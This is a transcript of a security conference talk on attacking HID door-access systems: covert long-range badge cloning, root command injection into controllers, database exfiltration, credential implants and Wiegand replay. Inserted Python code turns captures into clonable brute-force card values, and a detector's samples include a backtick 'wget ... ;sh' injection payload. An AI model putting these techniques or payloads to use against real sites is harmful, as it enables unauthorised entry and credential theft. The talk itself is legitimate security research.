
My name is Alex Steve, I'm a security consultant at NCC Group and I specialise in physical security. You can normally find me on the NetSec Focus Mattermost if you are on that too.

Today's talk will be about attacking the HID access control system. We'll go through the different types of technologies and the protocols being used, we'll go through long-range readers and how to build and weaponise them, we'll talk about the encryption on iClass, we'll go through attacking the controller itself, we'll go through long-range cloning, and then we'll go through a replay attack. As a little bonus, depending on time, we'll go through how we can clone the new next-generation SEOS credentials.

This is generally an overview of how things work. There are four main types of technologies that HID use: iClass, which is high frequency; MIFARE DESFire, which is another high frequency; and then two low frequencies, which are your HID Prox and your Indala Prox. These are more legacy-type cards; they used to be very popular and there's still a fair amount of them in use today, however most things are mostly DESFire, such as your Opal cards (they're DESFire), and your newer-style cards will be DESFire as well. The next-generation stuff is called SEOS. It actually does not care which type of credential it uses; it's a software-based encryption layer that makes it a little bit harder to crack, clone and so forth.

Generally the way it works is you present a card to the reader, the reader will do its calculations and then send a raw Wiegand output to the controller, and that controller will make a decision whether you have access or not. That controller is normally connected via RJ45 to a computer or access control software. At the bottom here you can see how things are typically set up in most environments if they're using all HID access control: there'll be a server, there'll be a brain that will have probably several of these slave devices connected to it. These slave devices are what your actual readers and your door strikes are connecting to, and like I said you can have probably about 36, I think, daisy-chained off that one brain. The newer-style instances have the all-in-one unit, so the dual readers will connect to it and the whole controller will be in that one unit over there.

The Wiegand protocol, I'm not going to go too much into this. It's basically just ones and zeros. Ones and zeros are transmitted through two wires, a green wire and a white wire, Data 0 and Data 1; it's basically just transmitting a sequence of ones and zeros with a corresponding facility code and site code. The way it does it depends on which card it is, so your legacy Prox card would send 26 bits of ones and zeros to the controller. A portion of that bit sequence is a site code and a portion of it is a facility code. Now the way you distinguish what they really are is basically each building has a site code, and each facility code would be like a card number, so person A would have one card number and person B would have another card number, but the site code would be the same across the building. There are different types of formats, obviously; Indala and iClass are different bit sequences, and the way you get the site code and facility code is actually through this little diagram over here, where we can see where you pull them out. On the top right there you'll see the actual raw output from the readers that's being sent to the controller. Sometimes they've got these numbers written down there at the bottom on the cards themselves.

So these are long-range readers. These are mostly designed for car parks and garages; it saves you from reaching really far out of the window of your car, so these have got long range on them, obviously. What we do with them is we weaponise these and use them to clone people's credentials. We'll put them in a backpack or whatever it is, I'll ask you for directions, I'll ask you if I'm in the right place or whatever it may be, and I'll secretly be cloning your credential. The two on the left are your iClass ones, your newer ones: the one on the left here is a legacy one and this one here is the new SEOS next-generation one. This one in the middle is Indala, that's not commonly used, and this one here is probably the most commonly used one, your legacy Prox card. The kind of read range you get from these things is probably about half a metre, pretty decent.

When you're building these things it's not super technical, it's not super hard: just a Raspberry Pi brain, and we have a logic level converter here for converting the voltages, so the reader will give a 5 volt output and the Raspberry Pi will want 3.3, so we just use that to control it. The way it works is the reader will read the card, it does all the heavy lifting, it decrypts whatever it needs to do and then sends that raw Wiegand output. That raw Wiegand output is captured by this Raspberry Pi, and the Raspberry Pi allows us to just remote in, access point in, and see all the credentials that we capture, which I'll go into further later. This little device here is called the Proxmark. The Proxmark, for those that don't know, is like a Swiss army knife for RFID cloning, basically.

So we'll go into our first card, which is your iClass legacy cards. These were pretty common up until recently; people are starting to convert to the next-generation SEOS. These were actually cracked thanks to some awesome people over here that did some research and pulled out a master key. Usually there's two kinds of keys for this system. The first key is a master key which is stored on all HID readers; this key, the best way I can explain it, is what enables you to read and write to the card. The next key is a triple DES key, the authentication keys. These keys are actually used to encrypt and decrypt data that's on the card, so in order to clone things you need this key, and in order to decrypt and encrypt from the long-range readers you need this key. The dump on the right here is what the Proxmark gives us; think of the card as these data blocks. What's interesting is that for legacy, the controller only really cares about this row right here, block 7. Block 7 is what contains your site code and your facility code, so no matter what you have in here, the only thing that's being sent is that block 7 data, so pay mindful attention to that one.

Cloning HID Prox and Indala low-frequency cards is very trivial. There's usually no encryption in there at all, so it's basically your site code and facility code, you encode that into hex, and then you clone that hex to a spare card; it's quite trivially easy. There are all these tools that you can use, they'll be in my references here, that can convert site codes and facility codes. Now for those that kind of pay attention, what that means is, since the facility code is the same across the board, you can brute-force people's ID numbers. So if Bob has access to the building and Alice has access to the server room, then I can brute-force Bob's site code, or facility code sorry, until I get the next one that may be Alice's authentication. We can do that through the Proxmark. Yep, so as I described, the only thing that's being sent is that block 7 data. So what we would do for long-range reading is we would... I think I'm missing a few slides.
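The Wiegand framing and 26-bit decode described above, plus the brute-force of neighbouring card numbers, as an added example that is not part of the talk and not code from NCC Group, HID or the proxmark3 project. It models what a Raspberry Pi sitting on a reader's Data 0 / Data 1 lines has to do: group the pulses into one message, decode the 26-bit format with both parity bits, and re-encode adjacent card numbers in the raw form the proxmark3 client takes for cloning. It uses the names from the H10301 format itself, facility code for the 8-bit field and card number for the 16-bit field, which correspond to what the talk calls site code and facility code. The inter-bit gap threshold, the 4-bit keypad encoding for PIN digits and the proxmark3 raw packing (preamble bit plus a length-marker bit above the data) are my assumptions, as marked in the comments; the constructed pulse stream stands in for a real GPIO capture.

```python
"""Wiegand capture, HID 26-bit (H10301) decode/encode and neighbour enumeration.

Added example for this page; not code from the talk, NCC Group, HID or the
proxmark3 project. It models what a Raspberry Pi sitting on a reader's D0/D1
lines has to do: frame the pulses into one message, decode the 26-bit format
with its parity bits, and re-encode adjacent card numbers in the raw form the
proxmark3 client takes for cloning. Timings and the raw packing are stated
assumptions (see comments).
"""
from dataclasses import dataclass

# Assumption: a pulse arrives on D0 for a 0 bit and on D1 for a 1 bit roughly
# every 1-2 ms; any silence longer than FRAME_GAP_US ends the current message.
FRAME_GAP_US = 25_000


def frame_pulses(events):
    """Group (line, t_us) pulse events into bit strings, one per message.

    `line` is 0 for a D0 pulse and 1 for a D1 pulse; `t_us` is a monotonic
    microsecond timestamp such as a GPIO edge callback would supply.
    """
    frames, current, last_t = [], [], None
    for line, t_us in events:
        if last_t is not None and current and t_us - last_t > FRAME_GAP_US:
            frames.append("".join(current))
            current = []
        current.append("1" if line else "0")
        last_t = t_us
    if current:
        frames.append("".join(current))
    return frames


def _parity(bits):
    """1 if the bit string has an odd number of ones, else 0."""
    return bits.count("1") & 1


@dataclass(frozen=True)
class H10301:
    facility_code: int   # 8-bit, the same across a site
    card_number: int     # 16-bit, one per badge


def decode_h10301(bits):
    """Decode a 26-bit H10301 frame: [E][FC:8][CN:16][O].

    E is even parity over the first 13 bits and O is odd parity over the last
    13. Returns None for a wrong length or a parity failure, so a noisy
    capture is rejected rather than turned into a bogus credential.
    """
    if len(bits) != 26 or _parity(bits[:13]) != 0 or _parity(bits[13:]) != 1:
        return None
    return H10301(int(bits[1:9], 2), int(bits[9:25], 2))


def encode_h10301(facility_code, card_number):
    """Inverse of decode_h10301: the 26-bit string for a FC/CN pair."""
    body = f"{facility_code & 0xFF:08b}{card_number & 0xFFFF:016b}"
    even = _parity(body[:12])        # makes the first 13 bits even
    odd = 1 - _parity(body[12:])     # makes the last 13 bits odd
    return f"{even}{body}{odd}"


def to_proxmark_raw(bits):
    """Pack a Wiegand bit string as a raw HID Prox value.

    Assumption about the proxmark3 layout (`lf hid clone -r <hex>`): a fixed
    preamble bit at position 37, a '1' immediately above the card data that
    marks its length, then the data. FC 118 / CN 1603 packs to 0x2006EC0C86.
    """
    return (1 << 37) | (1 << len(bits)) | int(bits, 2)


def neighbouring_cards(facility_code, card_number, span):
    """Enumerate card numbers within `span` of a captured one under the same
    facility code, as raw proxmark values: the brute-force from the talk, where
    the site-wide code is known and only the per-person number is guessed."""
    low, high = max(0, card_number - span), min(0xFFFF, card_number + span)
    return {cn: to_proxmark_raw(encode_h10301(facility_code, cn))
            for cn in range(low, high + 1) if cn != card_number}


def decode_keypad(bits):
    """4-bit-per-key keypad frames (0-9, '*' = 1010, '#' = 1011), one of the
    common Wiegand keypad formats; this is how a PIN like 1337 shows on the wire."""
    if len(bits) != 4 or int(bits, 2) > 11:
        return None
    return "0123456789*#"[int(bits, 2)]


def simulate_pulses(bit_strings, bit_period_us=2_000):
    """Constructed input for testing: the pulse events a reader would emit for
    the given messages, with a long gap between messages."""
    events, t = [], 0
    for bits in bit_strings:
        for b in bits:
            events.append((int(b), t))
            t += bit_period_us
        t += 10 * FRAME_GAP_US
    return events


if __name__ == "__main__":
    # One badge read (FC 118, CN 1603) followed by two keypad presses.
    for frame in frame_pulses(simulate_pulses([encode_h10301(118, 1603), "0001", "0011"])):
        print(frame, decode_h10301(frame) or decode_keypad(frame))
```

The parity check is the part worth keeping: a long-range capture at the edge of the half-metre range drops bits, and without it a truncated or flipped frame gets cloned onto a spare card and silently fails at the door.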
OK, sorry. What we would do for that long-range reading is we would capture a credential from the long-range reader. The long-range reader will do all the heavy lifting, it would decrypt everything for us and spit out a basic hex code. We'll take that hex code and then we'll write it to a spare card. So these are the commands that you use, pretty straightforward. I'll move on to attacking the controller using long-range cloning. This is a typical output that we would see from the Raspberry Pi. The Raspberry Pi has just a basic web GUI; you connect to it and, as I said, here is the raw block 7 that's unencrypted, that we can then convert into an encrypted version and then clone to a card. The output on the right here just shows you basic dumps, and this is just the back end of the long-range cloning. I'll just quickly play a video.
OK, so what you see here on the bottom right is a little demo setup that I've set up. It's basically just a bunch of readers with the controllers, and the bottom left here is the long-range cloning. This one here in particular is iClass long range. I'll take the card, or read the card... it won't read the card, sorry. So this card is the one that I want to clone. I'll scan it over my long-range reader, I'll capture the raw block 7 data from the Raspberry Pi, which is there. From that I'll take that raw unencrypted block data and then I'll encrypt it using the Proxmark here with the keys, the triple DES keys. That'll give me a block 7 data that I can then use to put on a spare card. So with that encrypted block data I'll write to a spare card. Sometimes it takes a couple of tries based on frequency and strength and things like that.
So that's written successfully. I'll use that card now to authenticate to the reader, and it's open just like normal. So that's essentially how easy it is to clone an iClass legacy card.
So the next attack we have is actually attacking the controllers themselves. Let's say you don't have access, you're not able to clone someone's card using long-range methods. There's actually another way to get RCE through the controller itself on the network. All these controllers broadcast on UDP 4070, right, so there's an easy way to tell whether a controller is on the network or not: it's just UDP 4070, it's open. And there's a function called command blink on, and this function is actually vulnerable to command injection due to lack of sanitisation of the user input, so we can just tack on backticks and our command and it'll just execute on the system as root, which is awesome. HID provide this tool, it's called the HID Discovery Tool; basically what it does is it allows you to locate your controllers on the network, and what they've done here is they've shown us the structure of their packet that's being sent, which is your command blink on, such and such, and such MAC address. So what this tool does is it sends this discover packet to port 4070 and the controller responds back with its information, such as its versioning, its MAC address and so forth. What we can do from then on is actually, like I said, use the backticks: we can hijack the number of commands we send on this last one here and just send a command through it, and like I said it will run as root. Concierge is a toolkit that Mike Kelly developed; I have since gone and forked it and added a lot more to it. We'll go through it later, however if you want a copy of this just reach out to me after this talk and I'll give it to you. So we'll do a demonstration of opening doors using that script.
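A detection-side counterpart to the injection described above, as an added example that is not part of the talk and not code from HID or the concierge toolkit. The talk only describes the discovery packet as "command blink on ... MAC address", so the semicolon-separated field layout assumed here (command, length, MAC, blink count) is a guess for illustration, as are the hypothetical hosts and the sample datagrams, which are constructed. The point it demonstrates is allow-list validation of what a legitimate HID Discovery Tool would send to UDP 4070, so that backticks, `$(...)` or extra `;`-chained fields in the blink request, or 4070 traffic from any host other than the access-control server, is reported rather than silently passed to a root shell.

```python
"""Flag command-injection attempts in HID discovery traffic on UDP/4070.

Added detection example for this page; not code from the talk, from HID, or
from the concierge toolkit. The talk only describes the packet as
"command blink on ... MAC address", so the field layout assumed here
(semicolon-separated: command, length, MAC, blink count) is a guess used for
illustration. The check is allow-list based: every field must look like what
the HID Discovery Tool would send, and anything else is reported.
"""
import re

MAC_RE = re.compile(r"^[0-9A-Fa-f]{12}$")        # 12 hex digits, no separators
NUM_RE = re.compile(r"^[0-9]{1,3}$")             # length and blink-count fields
SHELL_META = re.compile(r"[`$|&<>(){}\r\n]")     # ';' is caught by the field count


def classify(payload, src_ip, allowed_sources=frozenset()):
    """Return (verdict, reason) for one datagram sent to a controller on 4070.

    `allowed_sources`, when given, lists the hosts expected to run the
    discovery tool (assumed: the access-control server); the controller
    should never see 4070 traffic from anyone else.
    """
    if allowed_sources and src_ip not in allowed_sources:
        return "suspicious", f"4070 traffic from unexpected host {src_ip}"
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return "suspicious", "non-ASCII bytes in discovery payload"
    cmd, _, rest = text.rstrip("\x00").partition(";")
    # Anything that could start a subshell or chain a command is rejected
    # before the fields are even parsed.
    if SHELL_META.search(rest):
        return "suspicious", f"shell metacharacters after {cmd!r}: {rest!r}"
    fields = rest.rstrip(";").split(";") if rest else []
    if cmd == "discover":
        return "benign", "discover"
    if cmd == "command_blink_on":
        if len(fields) != 3:
            return "suspicious", f"{len(fields)} fields after blink command, expected 3"
        length, mac, count = fields
        if not NUM_RE.match(length):
            return "suspicious", f"bad length field {length!r}"
        if not MAC_RE.match(mac):
            return "suspicious", f"MAC field is not 12 hex digits: {mac!r}"
        if not NUM_RE.match(count):
            return "suspicious", f"blink count is not numeric: {count!r}"
        return "benign", f"blink {mac}"
    return "suspicious", f"unknown command {cmd!r}"


def scan(datagrams, allowed_sources=frozenset()):
    """Classify (src_ip, payload) pairs; returns a list of (src, verdict, reason)."""
    return [(src, *classify(payload, src, allowed_sources)) for src, payload in datagrams]


# Constructed sample traffic: two legitimate discovery-tool packets, then the
# kind of payloads the talk describes (backtick-wrapped command, $(...), and a
# ';'-chained extra command). Hosts are hypothetical.
SAMPLE_DATAGRAMS = [
    ("10.0.0.5", b"discover;013;"),
    ("10.0.0.5", b"command_blink_on;044;00062e0123ab;5"),
    ("192.0.2.9", b"command_blink_on;044;00062e0123ab;`wget http://192.0.2.9/c -O /tmp/c;sh /tmp/c`"),
    ("10.0.0.5", b"command_blink_on;044;00062e0123ab;$(id)"),
    ("10.0.0.5", b"command_blink_on;044;00062e0123ab;5;id"),
]

if __name__ == "__main__":
    for src, verdict, reason in scan(SAMPLE_DATAGRAMS, allowed_sources=frozenset({"10.0.0.5"})):
        print(f"{src:<12} {verdict:<10} {reason}")
```

Because the talk notes the controller itself keeps no logs, this check has to run where the datagrams can still be seen, for instance on a span port or a sensor in the same segment as the controllers, and the source-host allow-list is the cheaper signal: in most deployments only one machine should ever speak to port 4070.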
Same setup. What I normally do is run a discover that'll just basically tell me all the controllers on the network, using nmap, just standard looking for port 4070, so we can see we've got two controllers there. The way the script kind of works is basically I'm hosting a local web server with a command file, and the controller will pull that command file, execute it and go from there. So in this particular one what I'll do is I'm sending a command to open and then I'm sending a command to close. It's all done through the script, and you can also pick which type of strike you want, so door left and right depending on the configuration setup.

You can see at the bottom right there that's one, two, three doors with three request-to-exit doors, so left and right.
So what we just did there, basically, the way it works like I told you: we host a basic web server on our local machine with a file of commands in it, and then we use this particular command on the controller to wget it and execute it in a shell. The only thing I sent here was QUERY_STRING into an environment variable and then executing it. Pretty straightforward, nothing crazy.

So the door controllers actually have a local database, so when they're not connected to the access control software or the server they are able to make decisions on their own. The way they store them is they basically store a bunch of hex data in two files, and these files are accessdb and identdb. These files have, you know, permissions, when they can and cannot enter, if their credentials are saved or not, if they have PIN numbers, the actual hex ID for them. So when the card is being read it actually does not care about all the encryption and all that kind of stuff; it only knows that hex ID and whether in this table it's enabled or not, essentially. And you can find these files in the controller file system pretty easily. accessdb has a block size of 44; identdb has a block size of 28. If you look here, this is just basically an identifier of each credential, so 03 04 06 is just identifying a particular credential; this number 1 here just signifies door number one; and if you look at the next one here, this is the actual hex ID, which is your site code and your facility code, and then you've got your corresponding ID over here. It's quite trivial. Also with PIN numbers, 1337 obviously, PIN numbers you can record; these are saved within the controller database locally. So since we have RCE on the box, I'll do a demonstration of exfiltrating the database so we can look at it locally.

So, running the discover packet again, we want to make sure we're getting what we want. We'll send a request to exfiltrate the database, same sort of style as the other injection, where we host a bunch of commands and those commands get executed on the controller. What this is essentially doing is it's spinning up another web server, or it's copying the files to the web server of the controller, and then we're just wgetting them or curling them or whatever it is. So now we have a local copy of the controller database, and of course this script parses it nicely for us if we wanted to.
Let's do an implant. So again we can implant credentials if we like, since we have complete access to the controller.
I'm just going to show you here that these don't work. These are spare cards that I have and they're different frequencies, right, so one's a high frequency, one's a low frequency. It does not matter, like I said: the controllers don't care whether it's iClass, whether it's a Prox or whatever it is; as long as they get that raw Wiegand output and it's in their database they'll open the door. So here I'm in the script. I've put in an implant function that essentially implants the hex IDs of those two cards into the controller; all these functions are just serving commands to the controller. So now those cards will work because I've implanted them into the local database of the controller. Pretty simple.
What's also interesting with the controller is we can control the configuration of the readers. The readers can be configured to allow PIN only, card only, or PIN and card, and you have complete control of this, right, you can change this on the fly. On the right here you can see that there's a bunch of reader modes that you can set it to, and like the local database it's all just in files on the controllers that you can modify yourself. This particular one here says this particular reader, reader one, has a mode of 4; 4 is card and PIN. This one here is 2, so 2 would be card only. You can tell the PIN size as well: another file here called pin readers will tell you the PIN size for that particular reader, so if you want to change that later you can; you have complete control of it. We'll show a demonstration of changing that.
So 1337, that PIN number you saw in the database, that works. This particular reader is actually in PIN and card... PIN or card, sorry, so you can do either. So that's just showing that they both work, as a PIN or card. These are the files that are on the controller. We can then just log into that controller and change that file; in this particular case I think I change it to PIN only, if I remember correctly it was 3, so 3 signifies PIN only.

You have to change both those files and then you can just restart the daemon, or whatever you need to, the service that controls that, on the fly, and that basically just actions it. So now if I go to put my card, it will no longer work, it'll only be PIN only, so only my PIN will work. That's the PIN working as expected.

The card no longer works. Bear in mind that the card credential is still in the database, still enabled and everything, however the configuration of the reader doesn't enable it.
So the third attack that we can do is actually a physical-type attack; it's a replay attack. There's a device called the ESP-RFID-Tool, or if you like the Red Team Alliance guys they have their own tool, the ESPKey. Essentially this hijacks the Data 0 and Data 1 Wiegand wires from the reader physically, and it intercepts that bit sequence of the Wiegand protocol, and this has a little kind of GUI interface that you can just log into remotely. So essentially what I would do is I would implant the device: I pull the reader off the wall and then I'll implant it on the raw Wiegand wires, and I'll have my own power source. Usually it doesn't look this ugly; we've actually taken the header off this and put a punch-down in there, and we've removed the other headers, and it actually sits quite flush within the HID reader so you would never know. It would take us about 30 seconds, I think, to pull that reader off the wall and then put those wires in that little device there, so we can come back any time. I'll show you a demonstration of how that works and how easy it is: we don't even need to clone credentials, we don't even need to decrypt things.

So this is the output of that ESP-RFID-Tool. I've just shown here that that's a card that it's accepted. If you can see the tool right up here, I'll put it up here: within that GUI of the tool there I can see that I've captured a bit sequence of the Wiegand output. I can just trivially put that in that little bar there, retransmit, and I'm just going to open the door. Very easy. And you know HID keep coming out with these new-generation encryptions and software, but at the end of the day this raw Wiegand output is extremely vulnerable, so no matter how much you put their new credentials in, it's still vulnerable to this. And there you can even capture PIN numbers, so I've got the PIN number 1337.

Again, through the GUI interface, let's put in 1337, retransmit that bit sequence sent directly to the controller, and it's opening the door.
OK, so bonus round: cloning SEOS credentials. Like I said to you before, the SEOS credentials are the latest and greatest; they apply a software-layered encryption. Again, that means garbage, since the Wiegand output is still unencrypted ones and zeros, right. However there's a new method that's not been released yet, and that is essentially you can clone these new SEOS credentials and then put that raw unencrypted data onto an iClass legacy block and the reader will still accept it, so long as the reader is in legacy mode. So essentially you've got your new readers, your multiCLASS readers that I'm sure you guys have seen a bunch of times; they all look the same and they're accepting the new SEOS credentials. However, during the transition period some of these companies, or multi-tenant buildings, will have legacy enabled, which means if this has the latest and greatest reader and legacy is enabled on it then it's vulnerable. Why? Because we can clone legacy stuff but we can't clone the new SEOS stuff. And I'll show you how that works. If you remember earlier there were two of those iClass long-range readers, the long ones; the newest one has the ability to read the SEOS credential, right, and that reader does everything we need it to do. Like I said, the reader does all the heavy lifting; at the end of the day it's sending those bit sequences, so we can calculate that block 7 data from that bit sequence and then rewrite that block data to the legacy card, and that legacy card will open the door for us as if it was a SEOS card. The reader, the controller, does not care what type of card it is, if you remember. So I'll show you.

So this is what we get, right. From the long-range reading we get that raw unencrypted block. This card at the top level right here is actually the new SEOS card, and from that little unencrypted block right there we take that and we encrypt it into a block for the iClass legacy block that it can read, and we write it to that block. Here I am dumping the legacy card, and if you remember block number 7, it does not care, that's all that matters when it gets sent to the reader. So when I present that legacy iClass card to the reader, the reader is going to do its heavy lifting, it's still going to send that block 7, and that block 7 to the controller is a SEOS card, right, so the controller doesn't know, so it will open the door. So if you're running the latest and greatest SEOS, be mindful that if you have legacy enabled you can still clone them from long range.

And that's all I have. If there's any questions, let me know.

Q: Do they ship these readers with tamper detection?
A: They do. How often do people check them? Never.

A: Yeah, at the moment it's broken, not released. Private researchers have been looking into it; it is broken right now.

A: Yeah, sure, I'll upload it on YouTube after today.

Q: Besides doors, what else have you been able to do with RFID?
A: Gun safes, mostly. Yeah, gun safes, pretty much.

Q: Passports?
A: Passports run on UHF, right, so ultra high frequency. Not yet, no one's researched it yet as far as I know. Any other questions?

Q: What do you use personally at work? What do you trust?
A: I trust DESFire at the moment. DESFire is uncrackable. Even the new SEOS stuff, they're using DESFire; however, like I said, their readers are doing all the heavy lifting for us and then sending that raw Wiegand output. So all your Opal cards are running DESFire, right, all your credit cards are all DESFire. They can't be cloned long range and the encryption on them hasn't been cracked yet. There might be a bypass, a researcher I'm working with at the moment, however that's not proven.

A: Good question, no idea, don't know.

Q: How long range is long range?
A: About half a metre, yeah. Close enough to not be awkward and still capture.

A: Yes I have, thank you for asking. We are looking at Bluetooth. These readers have Bluetooth modules on them, right. I don't know what I did there, yeah, they have Bluetooth modules on them, so essentially they're constantly advertising, sending advertising packets. We have the capability right now of scanning those three channels of Bluetooth, and we've used a mobile device to capture those packets. At the moment we're reverse engineering the app to see if we can get encryption keys; haven't been successful so far but it's ongoing. So we can sort of capture things but we haven't gone anywhere from there.

Q: With your implants to the controller, the software's going to overwrite that. How often does it kill your implants?
A: That's a good question. It depends on the software. Sometimes it will, sometimes it won't; sometimes it'll do it every 30 seconds, sometimes it will do it every half an hour. It all depends on the configuration of the software. And also there's no logs, by the way, so on the controller itself there's no logs. The controllers are meant to work online, so if you stopped it from getting updates, exactly, then you're at the mercy of the controller, right.

Cool, thanks very much. [Applause]